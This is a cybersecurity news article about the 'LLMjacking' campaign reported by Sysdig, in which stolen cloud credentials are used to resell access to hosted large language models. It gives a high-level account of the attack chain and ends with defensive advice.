New ‘LLMjacking’ Attack Exploits Cloud-Hosted AI Models
May 10, 2024
A new form of cyber attack, termed 'LLMjacking' by the Sysdig Threat Research Team, has been identified. This scheme targets cloud-hosted large language models (LLMs) by using stolen cloud credentials. The ultimate goal of the attackers is to sell access to these models to other cybercriminals.
The attack begins with the cybercriminals gaining initial access to the system by exploiting a vulnerable version of the Laravel Framework, specifically CVE-2021-3129. They then exfiltrate cloud credentials and gain access to the cloud environment. From there, they attempt to access local LLM models hosted by cloud providers. As security researcher Alessandro Brucato stated, "Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers." In this case, a local Claude (v2/v3) LLM model from Anthropic was targeted.
The attackers utilize an open-source Python script, referred to as a keychecker, to check and validate keys for various offerings from Anthropic, AWS Bedrock, Google Cloud Vertex AI, Mistral, and OpenAI, among others. Interestingly, no legitimate LLM queries were actually run during the verification phase. As Brucato explained, "Instead, just enough was done to figure out what the credentials were capable of and any quotas."
The keychecker is integrated with another open-source tool known as oai-reverse-proxy, which serves as a reverse proxy server for LLM APIs. This indicates that the attackers are likely providing access to the compromised accounts without actually exposing the underlying credentials. Brucato added, "If the attackers were gathering an inventory of useful credentials and wanted to sell access to the available LLM models, a reverse proxy like this could allow them to monetize their efforts."
The attackers have also been seen querying logging settings, presumably in an attempt to avoid detection when using the compromised credentials to run their prompts. This type of attack is a shift from those that focus on model poisoning and prompt injections, as it allows the attackers to monetize their access to the LLMs, while the owner of the cloud account incurs the cost unknowingly. According to Sysdig, an attack of this nature could cost the victim over $46,000 in LLM consumption costs per day.
Brucato also pointed out that the use of LLM services can be quite costly, depending on the model and the number of tokens being fed to it. By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, which could disrupt business operations. To prevent such attacks, organizations are advised to enable detailed logging and monitor cloud logs for suspicious or unauthorized activity, and to have effective vulnerability management processes in place.
Latest News
- QakBot Malware Attacks Exploiting Windows Zero-Day Vulnerability Addressed by Microsoft
- Microsoft's May 2024 Patch Tuesday Addresses 61 Vulnerabilities Including 3 Zero-Days
- Google Scrambles to Patch Chrome Zero-Day Vulnerabilities Allowing Sandbox Escape
- Apple Patches Safari WebKit Zero-Day Exploit Uncovered at Pwn2Own
- VMware Patches Trio of Zero-Day Vulnerabilities Exposed at Pwn2Own 2024
Like what you see?
Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.